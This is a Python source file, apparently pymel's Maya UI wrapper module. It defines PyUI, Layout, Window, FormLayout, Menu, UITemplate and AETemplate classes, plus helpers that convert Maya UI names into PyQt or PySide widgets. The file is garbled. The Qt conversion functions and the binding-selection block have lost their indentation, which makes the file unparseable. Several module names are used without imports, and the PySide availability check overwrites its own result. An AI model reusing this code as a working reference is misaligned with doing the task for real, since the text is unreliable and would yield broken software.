import pymel.internal as _internal
import pymel.versions as _versions
import maya.mel as _mm
_logger = _internal.getLogger(__name__)
def _resolveUIFunc(name):
    """Resolve *name* to a callable ui command.

    Accepts any of:
      - a string: looked up first as a function on the ``windows`` module,
        then as a PyUI class on ``dynModule`` (whose ``__melcmd__()``
        wrapper is returned),
      - a function: returned unchanged,
      - a PyUI subclass: its ``__melcmd__()`` wrapper is returned.

    Raises ValueError when nothing matches.
    """
    if isinstance(name, basestring):
        import windows
        try:
            return getattr(windows, name)
        except AttributeError:
            try:
                cls = getattr(dynModule, name)
                return cls.__melcmd__()
            except (KeyError, AttributeError):
                pass
    else:
        import inspect
        if inspect.isfunction(name):
            return name
        elif inspect.isclass(name) and issubclass(name, PyUI):
            # BUG FIX: the wrapper was previously computed but never
            # returned, so valid PyUI subclasses fell through to the
            # ValueError below.
            return name.__melcmd__()
    raise ValueError("%r is not a known ui type" % name)
if _versions.current() >= _versions.v2011:
def toPyQtObject(mayaName):
"""
Given the name of a Maya UI element of any type, return the corresponding QWidget or QAction.
If the object does not exist, returns None
When using this function you don't need to specify whether UI type is a control, layout,
window, or menuItem, the first match -- in that order -- will be returned. If you have the full path to a UI object
this should always be correct, however, if you only have the short name of the UI object,
consider using one of the more specific variants: `toQtControl`, `toQtLayout`, `toQtWindow`, or `toQtMenuItem`.
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtcore.QObject)
def toPyQtControl(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtLayout(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtWindow(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findWindow(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QWidget)
def toPyQtMenuItem(mayaName):
"""
Given the name of a May UI menuItem, return the corresponding QAction.
If the object does not exist, returns None
This only works for menu items. for Menus, use toQtControl or toQtObject
.. note:: Requires PyQt
"""
import maya.OpenMayaUI as mui
import sip
import PyQt4.QtCore as qtcore
import PyQt4.QtGui as qtgui
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return sip.wrapinstance(long(ptr), qtgui.QAction)
# PYSIDE VERSIONS
    def pysideWrapInstance(ptr, base=None):
        '''Utility to convert a pointer to a Qt Class and produce the same result
        as sip.wrapinstance using shiboken.wrapInstance.

        Note: This is modeled after nathanhorne.com/?p=486. The base arg isn't
        currently used, and defaults to QObject. The way that base arg was used
        seems like it would give a different result than the sip version. It would
        skip the checking for attribute and just use base as base, however the sip
        version will still return QMainWindow even if QObject is passed in.
        '''
        if ptr is None:
            return
        try:
            # prefer PySide2/shiboken2; fall back to PySide(1), where widgets
            # live in QtGui, so QtGui doubles as the qtwidgets namespace
            import PySide2.QtCore as qtcore
            import PySide2.QtGui as qtgui
            import PySide2.QtWidgets as qtwidgets
            from shiboken2 import wrapInstance
        except ImportError:
            import shiboken
            import PySide.QtCore as qtcore
            import PySide.QtGui as qtgui
            import PySide.QtGui as qtwidgets
            from shiboken import wrapInstance
        # wrap as a plain QObject first so the runtime meta-object can be
        # queried, then re-wrap with the most derived class we can locate
        qObj = wrapInstance(long(ptr), qtcore.QObject)
        metaObj = qObj.metaObject()
        cls = metaObj.className()
        superCls = metaObj.superClass().className()
        # look up the concrete class (then its direct superclass) in QtGui,
        # then in QtWidgets
        if hasattr(qtgui, cls):
            base = getattr(qtgui, cls)
        elif hasattr(qtgui, superCls):
            base = getattr(qtgui, superCls)
        elif hasattr(qtwidgets, cls):
            base = getattr(qtwidgets, cls)
        elif hasattr(qtwidgets, superCls):
            base = getattr(qtwidgets, superCls)
        else:
            # fall back to a generic widget wrapper
            base = qtwidgets.QWidget
        return wrapInstance(long(ptr), base)
def toPySideObject(mayaName):
"""
Given the name of a Maya UI element of any type, return the corresponding QWidget or QAction.
If the object does not exist, returns None
When using this function you don't need to specify whether UI type is a control, layout,
window, or menuItem, the first match -- in that order -- will be returned. If you have the full path to a UI object
this should always be correct, however, if you only have the short name of the UI object,
consider using one of the more specific variants: `toQtControl`, `toQtLayout`, `toQtWindow`, or `toQtMenuItem`.
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import PySide2.QtCore as qtcore
except ImportError:
import PySide.QtCore as qtcore
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is None:
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtcore.QObject)
def toPySideControl(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findControl(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideLayout(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findLayout(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideWindow(mayaName):
"""
Given the name of a May UI control, return the corresponding QWidget.
If the object does not exist, returns None
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findWindow(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QWidget)
def toPySideMenuItem(mayaName):
"""
Given the name of a Maya UI menuItem, return the corresponding QAction.
If the object does not exist, returns None
This only works for menu items. for Menus, use toQtControl or toQtObject
.. note:: Requires PySide
"""
import maya.OpenMayaUI as mui
try:
import shiboken2
import PySide2.QtCore as qtcore
import PySide2.QtWidgets as qtwidgets
except ImportError:
import shiboken
import PySide.QtCore as qtcore
import PySide.QtGui as qtwidgets
ptr = mui.MQtUtil.findMenuItem(mayaName)
if ptr is not None:
return pysideWrapInstance(long(ptr), qtwidgets.QAction)
# Assign functions to PyQt versions if PyQt is available, otherwise set to PySide versions
try:
import sip
import PyQt4
pyQtAvailable = True
except ImportError:
pyQtAvailable = False
try:
import shiboken
import PySide
pySideAvailable = True
except ImportError:
pySideAvailable = False
try:
import shiboken2
import PySide2
pySideAvailable = True
except ImportError:
pySideAvailable = False
if pyQtAvailable and not pySideAvailable:
qtBinding = 'pyqt'
elif pySideAvailable and not pyQtAvailable:
qtBinding = 'pyside'
else:
qtBinding = _startup.pymel_options['preferred_python_qt_binding']
if qtBinding == 'pyqt':
toQtObject = toPyQtObject
toQtControl = toPyQtControl
toQtLayout = toPyQtLayout
toQtWindow = toPyQtWindow
toQtMenuItem = toPyQtMenuItem
elif qtBinding == 'pyside':
toQtObject = toPySideObject
toQtControl = toPySideControl
toQtLayout = toPySideLayout
toQtWindow = toPySideWindow
toQtMenuItem = toPySideMenuItem
else:
raise ValueError('preferred_python_qt_binding must be set to either'
' pyside or pyqt')
# really, this should be in core.windows; but, due to that fact that this module
# is "higher" in the import hierarchy than core.windows, and we need this function
# here, we're just defining it here
@_factories.addMelDocs('objectTypeUI')
def objectTypeUI(name, **kwargs):
    """Return the ui type of *name*, working around several Maya quirks:
    falls back to the short name for types (radioCollections) that are only
    found that way, and probes a list of common control commands for
    rowGroupLayout children that objectTypeUI cannot query.
    Re-raises the original RuntimeError when everything fails."""
    try:
        return cmds.objectTypeUI(name, **kwargs)
    except RuntimeError as topError:
        try:
            # some ui types (radioCollections) can only be identified with their shortname
            return cmds.objectTypeUI(name.split('|')[-1], **kwargs)
        except RuntimeError:
            # we cannot query the type of rowGroupLayout children: check common types for these
            uiType = None
            # BUG FIX: 'floatField' was listed twice; duplicate removed
            typesToCheck = 'checkBox floatField button floatSlider intSlider ' \
                'textField intField optionMenu radioButton'.split()
            if _versions.current() >= _versions.v2012_SP2:
                # 2012 SP2 introduced a bug where doing:
                # win = cmds.window(menuBar=True)
                # cmds.objectTypeUI(win)
                # would error...
                typesToCheck.append('window')
            for cmdName in typesToCheck:
                if getattr(cmds, cmdName)(name, ex=1, q=1):
                    uiType = cmdName
                    break
            if uiType:
                return uiType
            raise topError
class PyUI(unicode):
    """Base wrapper for Maya ui element names; subclasses of unicode so an
    instance IS the (long) ui path string."""

    def __new__(cls, name=None, create=False, **kwargs):
        """
        Provides the ability to create the PyUI Element when creating a class::

            import pymel.core as pm
            n = pm.Window("myWindow",create=True)
            n.__repr__()
            # Result: Window('myWindow')
        """
        # when called through the base class, dispatch to the most specific
        # wrapper class registered for this ui element's type
        if cls is PyUI:
            try:
                uiType = objectTypeUI(name)
            except RuntimeError:
                uiType = 'PyUI'
            uiType = _uiTypesToCommands.get(uiType, uiType)
            try:
                newcls = getattr(dynModule, _util.capitalize(uiType))
            except AttributeError:
                newcls = PyUI
                # objectTypeUI for panels seems to return weird results -
                # ie, TmodelPane ... check for them this way.
                # Other types should be detected correctly by objectTypeUI,
                # but this just provides a failsafe...
                for testType in 'panel scriptedPanel window control layout menu'.split():
                    if getattr(cmds, testType)(name, ex=1, q=1):
                        newcls = getattr(dynModule, _util.capitalize(testType),
                                         PyUI)
                        if newcls != PyUI:
                            break
        else:
            newcls = cls
        if not newcls is PyUI:
            if cls._isBeingCreated(name, create, kwargs):
                # create the ui element now via its mel command wrapper
                name = newcls.__melcmd__(name, **kwargs)
                _logger.debug("PyUI: created... %s" % name)
            else:
                # find the long name
                if '|' not in name and not issubclass(newcls,
                                                      (Window,
                                                       Panel,
                                                       dynModule.ScriptedPanel,
                                                       dynModule.RadioCollection,
                                                       dynModule.ToolCollection)):
                    import windows
                    try:
                        if issubclass(newcls, Layout):
                            parent = windows.layout(name, q=1, p=1)
                        elif issubclass(newcls, OptionMenu):
                            parent = windows.optionMenu(name, q=1, p=1)
                        elif issubclass(newcls, Menu):
                            parent = windows.menu(name, q=1, p=1)
                        else:
                            parent = windows.control(name, q=1, p=1)
                        if parent:
                            name = parent + '|' + name
                    except RuntimeError:
                        # editors don't have a long name, so we keep the short name
                        if name not in cmds.lsUI(long=True, editors=True):
                            raise
        # correct for optionMenu
        if newcls == PopupMenu and cmds.optionMenu(name, ex=1):
            newcls = OptionMenu
        return unicode.__new__(newcls, name)

    @staticmethod
    def _isBeingCreated(name, create, kwargs):
        """
        create a new node when any of these conditions occur:
           name is None
           create is True
           parent flag is set
        """
        return not name or create or ('q' not in kwargs and kwargs.get('parent', kwargs.get('p', None)))

    def __repr__(self):
        return u"ui.%s('%s')" % (self.__class__.__name__, self)

    def parent(self):
        """Return the parent PyUI element, or None for a top-level element."""
        buf = unicode(self).split('|')[:-1]
        if len(buf) == 2 and buf[0] == buf[1] and _versions.current() < _versions.v2011:
            # pre-2011, windows with menus can have a strange name:
            # ex.  window1|window1|menu1
            buf = buf[:1]
        if not buf:
            return None
        return PyUI('|'.join(buf))
    getParent = parent

    def shortName(self):
        """Return the last path component of this ui element's name."""
        return unicode(self).split('|')[-1]

    def name(self):
        """Return this ui element's name as a plain unicode string."""
        return unicode(self)

    def window(self):
        """Return the Window at the root of this ui element's path."""
        return Window(self.name().split('|')[0])
    delete = _factories.functionFactory('deleteUI', rename='delete')
    rename = _factories.functionFactory('renameUI', rename='rename')
    type = objectTypeUI

    @classmethod
    def exists(cls, name):
        return cls.__melcmd__(name, exists=True)
    if _versions.current() >= _versions.v2011:
        asQtObject = toQtControl
class Panel(PyUI):
    """pymel panel class"""
    __metaclass__ = _factories.MetaMayaUIWrapper
    # note that we're not actually customizing anything, but
    # we're declaring it here because other classes will have this
    # as their base class, so we need to make sure it exists first

# stacks of layouts/menus entered via the 'with' statement; used by
# Layout.__enter__/__exit__ and Menu.__enter__/__exit__ to restore the
# previous default ui parent
_withParentStack = []
_withParentMenuStack = []
class Layout(PyUI):
    """Base class for pymel layout wrappers.

    Instances work as context managers: entering a layout makes it the
    default ui parent; exiting restores the previous parent (the enclosing
    'with' layout, or this layout's own parent).
    """

    def __enter__(self):
        global _withParentStack
        _withParentStack.append(self)
        self.makeDefault()
        return self

    def __exit__(self, type, value, traceback):
        global _withParentStack
        _withParentStack.pop()
        if _withParentStack:
            parent = _withParentStack[-1]
        else:
            parent = self.pop()
            # rowGroupLayouts cannot act as a default parent; keep popping
            # until we reach something that can
            while parent and objectTypeUI(parent) == u'rowGroupLayout':
                parent = parent.pop()
        cmds.setParent(parent)

    def children(self):
        """Return the immediate children of this layout as PyUI instances."""
        # return [ PyUI( self.name() + '|' + x) for x in self.__melcmd__(self, q=1, childArray=1) ]
        kids = cmds.layout(self, q=1, childArray=1)
        if kids:
            return [PyUI(self.name() + '|' + x) for x in kids]
        return []
    getChildren = children

    # TODO: add depth first and breadth first options
    def walkChildren(self):
        """
        recursively yield all children of this layout
        """
        for child in self.children():
            yield child
            if hasattr(child, 'walkChildren'):
                for subChild in child.walkChildren():
                    yield subChild

    def findChild(self, shortName, recurse=False):
        """Return the first child (searched recursively when *recurse* is
        True) whose short name equals *shortName*, or None if no match."""
        if recurse:
            for child in self.walkChildren():
                if child.shortName() == shortName:
                    return child
        else:
            for child in self.children():
                if child.shortName() == shortName:
                    return child

    def addChild(self, uiType, name=None, **kwargs):
        """Create a ui element of *uiType* parented under this layout and
        return it as a PyUI instance; any passed parent flag is ignored."""
        if isinstance(uiType, basestring):
            uiType = getattr(dynModule, uiType)
        assert hasattr(uiType, '__call__'), 'argument uiType must be the name of a known ui type, a UI subclass, or a callable object'
        args = []
        if name:
            args.append(name)
        if kwargs:
            if 'parent' in kwargs or 'p' in kwargs:
                _logger.warn('parent flag is set by addChild automatically. passed value will be ignored')
                kwargs.pop('parent', None)
                kwargs.pop('p', None)
        kwargs['parent'] = self
        res = uiType(*args, **kwargs)
        if not isinstance(res, PyUI):
            res = PyUI(res)
        return res

    def makeDefault(self):
        """
        set this layout as the default parent
        """
        cmds.setParent(self)

    def pop(self):
        """
        set the default parent to the parent of this layout
        """
        p = self.parent()
        cmds.setParent(p)
        return p

    def clear(self):
        """Delete every child of this layout."""
        children = self.getChildArray()
        if children:
            # BUG FIX: the child array was previously re-queried for the
            # loop; reuse the result fetched above
            for child in children:
                cmds.deleteUI(child)
    if _versions.current() >= _versions.v2011:
        asQtObject = toQtLayout
# customized ui classes
class Window(Layout):
    """pymel window class"""
    __metaclass__ = _factories.MetaMayaUIWrapper
    # if _versions.current() < _versions.v2011:
    #     # don't set
    #     def __enter__(self):
    #         return self

    def __exit__(self, type, value, traceback):
        # restore the default parent, then make the window visible
        super(Window, self).__exit__(type, value, traceback)
        self.show()

    def show(self):
        """Display this window."""
        cmds.showWindow(self)

    def delete(self):
        """Delete this window (and its children)."""
        cmds.deleteUI(self, window=True)

    def layout(self):
        """Return the window's top-level layout as a PyUI instance, or
        None when the window has no layout yet."""
        name = self.name()
        for layout in sorted(cmds.lsUI(long=True, controlLayouts=True)):
            # since we are sorted, shorter will be first, and the first layout we come across will be the base layout
            if layout.startswith(name):
                return PyUI(layout)
        # # create a child and then delete it to get the layout
        # res = self.addChild(cmds.columnLayout)
        # layout = res.parent()
        # res.delete()
        # return layout

    def children(self):
        # a window has at most one child: its base layout
        res = self.layout()
        return [res] if res else []
    getChildren = children

    def window(self):
        """A window is its own window."""
        return self

    def parent(self):
        """Windows are top-level: they have no parent."""
        return None
    getParent = parent
    if _versions.current() >= _versions.v2011:
        asQtObject = toQtWindow
class FormLayout(Layout):
    """pymel formLayout wrapper with ratio-based child distribution helpers."""
    __metaclass__ = _factories.MetaMayaUIWrapper

    def __new__(cls, name=None, **kwargs):
        # strip the pymel-only constructor options so the underlying mel
        # command never sees them
        if kwargs:
            [kwargs.pop(k, None) for k in ['orientation', 'ratios', 'reversed', 'spacing']]
        self = Layout.__new__(cls, name, **kwargs)
        return self

    def __init__(self, name=None, orientation='vertical', spacing=2, reversed=False, ratios=None, **kwargs):
        """
        spacing - absolute space between controls
        orientation - the orientation of the layout [ AutoLayout.HORIZONTAL | AutoLayout.VERTICAL ]
        """
        # NOTE: the 'reversed' parameter intentionally shadows the builtin
        # to keep the public keyword name stable
        Layout.__init__(self, **kwargs)
        self._spacing = spacing
        self._orientation = self.Orientation.getIndex(orientation)
        self._reversed = reversed
        self._ratios = ratios and list(ratios) or []

    def attachForm(self, *args):
        kwargs = {'edit': True}
        kwargs['attachForm'] = [args]
        cmds.formLayout(self, **kwargs)

    def attachControl(self, *args):
        kwargs = {'edit': True}
        kwargs['attachControl'] = [args]
        cmds.formLayout(self, **kwargs)

    def attachNone(self, *args):
        kwargs = {'edit': True}
        kwargs['attachNone'] = [args]
        cmds.formLayout(self, **kwargs)

    def attachPosition(self, *args):
        kwargs = {'edit': True}
        kwargs['attachPosition'] = [args]
        cmds.formLayout(self, **kwargs)

    HORIZONTAL = 0
    VERTICAL = 1
    Orientation = _util.enum.Enum('Orientation', ['horizontal', 'vertical'])

    def flip(self):
        """Flip the orientation of the layout """
        self._orientation = 1 - self._orientation
        self.redistribute(*self._ratios)

    def reverse(self):
        """Reverse the children order """
        self._reversed = not self._reversed
        self._ratios.reverse()
        self.redistribute(*self._ratios)

    def reset(self):
        """Clear ratios and reversal, then evenly redistribute children."""
        self._ratios = []
        self._reversed = False
        self.redistribute()

    def redistribute(self, *ratios):
        """
        Redistribute the child controls based on the ratios.
        If not ratios are given (or not enough), 1 will be used
        """
        # sides[0] spans a vertical stack; sides[1] spans a horizontal one
        sides = [["top", "bottom"], ["left", "right"]]
        children = self.getChildArray()
        if not children:
            return
        if self._reversed:
            children.reverse()
        ratios = list(ratios) or self._ratios or []
        # pad with 1s so every child has a ratio
        ratios += [1] * (len(children) - len(ratios))
        self._ratios = ratios
        total = sum(ratios)
        for i, child in enumerate(children):
            # pin both cross-axis edges of each child to the form
            for side in sides[self._orientation]:
                self.attachForm(child, side, self._spacing)
            if i == 0:
                # first child attaches to the form's leading edge
                self.attachForm(child,
                                sides[1 - self._orientation][0],
                                self._spacing)
            else:
                # subsequent children attach to the previous child
                self.attachControl(child,
                                   sides[1 - self._orientation][0],
                                   self._spacing,
                                   children[i - 1])
            if ratios[i]:
                # trailing edge lands at the child's cumulative ratio share
                self.attachPosition(children[i],
                                    sides[1 - self._orientation][1],
                                    self._spacing,
                                    float(sum(ratios[:i + 1])) / float(total) * 100)
            else:
                self.attachNone(children[i],
                                sides[1 - self._orientation][1])

    def vDistribute(self, *ratios):
        """Switch to vertical orientation and redistribute."""
        self._orientation = int(self.Orientation.vertical)
        self.redistribute(*ratios)

    def hDistribute(self, *ratios):
        """Switch to horizontal orientation and redistribute."""
        self._orientation = int(self.Orientation.horizontal)
        self.redistribute(*ratios)
class AutoLayout(FormLayout):
    """
    AutoLayout behaves exactly like `FormLayout`, but will call redistribute automatically
    at the end of a 'with' statement block
    """

    def __exit__(self, type, value, traceback):
        # distribute children before the base class restores the parent
        self.redistribute()
        super(AutoLayout, self).__exit__(type, value, traceback)
class RowLayout(Layout):
    """pymel rowLayout wrapper."""
    __metaclass__ = _factories.MetaMayaUIWrapper
class TextScrollList(PyUI):
    """pymel textScrollList wrapper with batch convenience methods."""
    __metaclass__ = _factories.MetaMayaUIWrapper

    def extend(self, appendList):
        """Append each string in *appendList* to the list."""
        for entry in appendList:
            self.append(entry)

    def selectIndexedItems(self, selectList):
        """Select every (1-based) index in *selectList*."""
        for index in selectList:
            self.setSelectIndexedItem(index)

    def removeIndexedItems(self, removeList):
        """Remove every (1-based) index in *removeList*."""
        for index in removeList:
            self.removeIndexedItem(index)

    def selectAll(self):
        """Select every item in the list."""
        itemCount = self.getNumberOfItems()
        self.selectIndexedItems(range(1, itemCount + 1))
class Menu(PyUI):
    """pymel menu wrapper; usable as a context manager to parent new items."""
    __metaclass__ = _factories.MetaMayaUIWrapper

    def __enter__(self):
        # push onto the menu-parent stack so nested 'with' blocks can
        # restore the previous default menu on exit
        global _withParentMenuStack
        _withParentMenuStack.append(self)
        self.makeDefault()
        return self

    def __exit__(self, type, value, traceback):
        global _withParentMenuStack
        _withParentMenuStack.pop()
        if _withParentMenuStack:
            cmds.setParent(_withParentMenuStack[-1], menu=True)
        else:
            # no enclosing 'with' menu: walk up the ui hierarchy until
            # setParent accepts an ancestor as the default menu parent
            parent = self
            while True:
                parent = parent.parent()
                # Maya 2012 Service Pack 2 (or SAP1, SP1) introduces a bug where
                # '' is returned, instead of None; problem being that doing
                # cmds.setParent(None, menu=True) is valid, but
                # cmds.setParent('', menu=True) is not
                if parent == '':
                    parent = None
                try:
                    cmds.setParent(parent, menu=True)
                except RuntimeError:
                    continue
                break

    def getItemArray(self):
        """ Modified to return pymel instances """
        return [MenuItem(self + '|' + item) for item in cmds.menu(self, query=True, itemArray=True) or []]

    def makeDefault(self):
        """
        set this layout as the default parent
        """
        cmds.setParent(self, menu=True)
class PopupMenu(Menu):
    """pymel popupMenu wrapper."""
    __metaclass__ = _factories.MetaMayaUIWrapper
class OptionMenu(PopupMenu):
    """pymel optionMenu wrapper."""
    __metaclass__ = _factories.MetaMayaUIWrapper

    def addMenuItems(self, items, title=None):
        """ Add the specified item list to the OptionMenu, with an optional 'title' item """
        if title:
            # a disabled item serves as a non-selectable title
            cmds.menuItem(l=title, en=0, parent=self)
        for entry in items:
            cmds.menuItem(l=entry, parent=self)

    def clear(self):
        """ Clear all menu items from this OptionMenu """
        for itemName in (self.getItemListLong() or []):
            cmds.deleteUI(itemName)
    addItems = addMenuItems
class OptionMenuGrp(RowLayout):
    """pymel optionMenuGrp wrapper."""
    __metaclass__ = _factories.MetaMayaUIWrapper

    def menu(self):
        """Return the child OptionMenu of this group, or None if absent."""
        for child in self.children():
            if isinstance(child, OptionMenu):
                return child

    # Want to set both the menu to the child |OptionMenu item, and the normal
    # parent to this...
    def __enter__(self):
        self.menu().__enter__()
        return super(OptionMenuGrp, self).__enter__()

    def __exit__(self, type, value, traceback):
        self.menu().__exit__(type, value, traceback)
        return super(OptionMenuGrp, self).__exit__(type, value, traceback)
class SubMenuItem(Menu):
    """Wrapper for a menuItem that is itself a sub-menu."""

    def getBoldFont(self):
        return cmds.menuItem(self, query=True, boldFont=True)

    def getItalicized(self):
        return cmds.menuItem(self, query=True, italicized=True)
    if _versions.current() >= _versions.v2011:
        asQtObject = toQtMenuItem
class CommandMenuItem(PyUI):
    """Wrapper for a plain (command) menuItem. The context-manager protocol
    delegates to SubMenuItem so items created inside a 'with' block are
    parented under this item."""
    __metaclass__ = _factories.MetaMayaUIWrapper
    __melui__ = 'menuItem'

    def __enter__(self):
        SubMenuItem(self).__enter__()
        return self

    def __exit__(self, type, value, traceback):
        return SubMenuItem(self).__exit__(type, value, traceback)
def MenuItem(name=None, create=False, **kwargs):
    """Factory returning the appropriate menuItem wrapper: a SubMenuItem
    for sub-menu items, otherwise a CommandMenuItem. New items (or items
    whose type cannot be queried) default sensibly."""
    if PyUI._isBeingCreated(name, create, kwargs):
        return CommandMenuItem(name, create, **kwargs)
    try:
        itemType = objectTypeUI(name)
    except RuntimeError:
        # type unqueryable: assume a sub-menu item
        return SubMenuItem(name, create, **kwargs)
    if itemType == 'subMenuItem':
        return SubMenuItem(name, create, **kwargs)
    return CommandMenuItem(name, create, **kwargs)
class UITemplate(object):
    """
    from pymel.core import *

    # force deletes the template if it already exists
    template = ui.UITemplate( 'ExampleTemplate', force=True )

    template.define( button, width=100, height=40, align='left' )
    template.define( frameLayout, borderVisible=True, labelVisible=False )

    #    Create a window and apply the template.
    #
    with window():
        with template:
            with columnLayout( rowSpacing=5 ):
                with frameLayout():
                    with columnLayout():
                        button( label='One' )
                        button( label='Two' )
                        button( label='Three' )

                with frameLayout():
                    with columnLayout():
                        button( label='Red' )
                        button( label='Green' )
                        button( label='Blue' )
    """

    def __init__(self, name=None, force=False):
        # reuse an existing template of the same name unless force=True,
        # in which case it is deleted and recreated
        if name and cmds.uiTemplate(name, exists=True):
            if force:
                cmds.deleteUI(name, uiTemplate=True)
            else:
                self._name = name
                return
        args = [name] if name else []
        self._name = cmds.uiTemplate(*args)

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self._name)

    def __enter__(self):
        self.push()
        return self

    def __exit__(self, type, value, traceback):
        self.pop()

    def name(self):
        """Return the name of the underlying uiTemplate."""
        return self._name

    def push(self):
        """Make this template the active ui template."""
        cmds.setUITemplate(self._name, pushTemplate=True)

    def pop(self):
        """Restore the previously active ui template."""
        cmds.setUITemplate(popTemplate=True)

    def define(self, uiType, **kwargs):
        """
        uiType can be:
            - a ui function or class
            - the name of a ui function or class
            - a list or tuple of the above
        """
        if isinstance(uiType, (list, tuple)):
            funcs = [_resolveUIFunc(x) for x in uiType]
        else:
            funcs = [_resolveUIFunc(uiType)]
        kwargs['defineTemplate'] = self._name
        for func in funcs:
            func(**kwargs)

    @staticmethod
    def exists(name):
        """Return True when a ui template named *name* already exists."""
        return cmds.uiTemplate(name, exists=True)
class AELoader(type):
    """
    Metaclass used by `AETemplate` class to create wrapping and loading mechanisms when an AETemplate instance is created
    """
    _loaded = []  # names of AE template procs registered so far

    def __new__(cls, classname, bases, classdict):
        newcls = super(AELoader, cls).__new__(cls, classname, bases, classdict)
        try:
            nodeType = newcls.nodeType()
        except ValueError:
            # class neither follows the AE<nodeType>Template convention nor
            # sets _nodeType: skip registration
            _logger.debug("could not determine node type for " + classname)
        else:
            modname = classdict['__module__']
            if modname == '__builtin__':
                # since the module is __builtin__ our AE was probably included in the body of a scripted
                # plugin, which is called by maya in a strange way ( execfile? ).
                # give it a real home so we can load it later.
                mod = sys.modules['__builtin__']
                setattr(mod, classname, newcls)
            template = 'AE' + nodeType + 'Template'
            cls.makeAEProc(modname, classname, template)
            if template not in cls._loaded:
                cls._loaded.append(template)
        return newcls

    @staticmethod
    def makeAEProc(modname, classname, procname):
        """Generate and evaluate the global mel proc Maya calls to build the
        AE template; the proc delegates back to AELoader.load."""
        _logger.debug("making AE loader procedure: %s" % procname)
        contents = '''global proc %(procname)s( string $nodeName ){
        python("import %(__name__)s;%(__name__)s.AELoader.load('%(modname)s','%(classname)s','" + $nodeName + "')");}'''
        d = locals().copy()
        d['__name__'] = __name__
        import maya.mel as mm
        mm.eval(contents % d)

    @staticmethod
    def load(modname, classname, nodename):
        """Import *modname* and instantiate its *classname* template for the
        given node, printing (not raising) on failure so Maya's AE keeps
        working."""
        mod = __import__(modname, globals(), locals(), [classname], -1)
        try:
            cls = getattr(mod, classname)
            cls(nodename)
        except Exception:
            print "failed to load python attribute editor template '%s.%s'" % (modname, classname)
            import traceback
            traceback.print_exc()

    @classmethod
    def loadedTemplates(cls):
        "Return the names of the loaded templates"
        return cls._loaded
class AETemplate(object):
    """
    To create an Attribute Editor template using python, do the following:
        1. create a subclass of `uitypes.AETemplate`
        2. set its ``_nodeType`` class attribute to the name of the desired node type, or name the class using the
    convention ``AE<nodeType>Template``
        3. import the module

    AETemplates which do not meet one of the two requirements listed in step 2 will be ignored.  To ensure that your
    Template's node type is being detected correctly, use the ``AETemplate.nodeType()`` class method::

        import AETemplates
        AETemplates.AEmib_amb_occlusionTemplate.nodeType()

    As a convenience, when pymel is imported it will automatically import the module ``AETemplates``, if it exists,
    thereby causing any AETemplates within it or its sub-modules to be registered. Be sure to import pymel
    or modules containing your ``AETemplate`` classes before opening the Attribute Editor for the node types in question.

    To check which python templates are loaded::

        from pymel.core.uitypes import AELoader
        print AELoader.loadedTemplates()
    """
    __metaclass__ = AELoader
    _nodeType = None  # override, or rely on the AE<nodeType>Template naming convention

    def __init__(self, nodeName):
        self._nodeName = nodeName

    @property
    def nodeName(self):
        # name of the node this template instance is editing
        return self._nodeName

    @classmethod
    def nodeType(cls):
        """Return the node type this template applies to: ``_nodeType`` when
        set, otherwise parsed from an ``AE<nodeType>Template`` class name."""
        if cls._nodeType:
            return cls._nodeType
        else:
            m = re.match('AE(.+)Template$', cls.__name__)
            if m:
                return m.groups()[0]
            else:
                raise ValueError("You must either name your AETemplate subclass of the form 'AE<nodeType>Template' or set the '_nodeType' class attribute")

    @classmethod
    def controlValue(cls, nodeName, control):
        """Query the current value of *control* for *nodeName*."""
        return cmds.editorTemplate(queryControl=(nodeName, control))

    @classmethod
    def controlLabel(cls, nodeName, control):
        """Query the label of *control* for *nodeName*."""
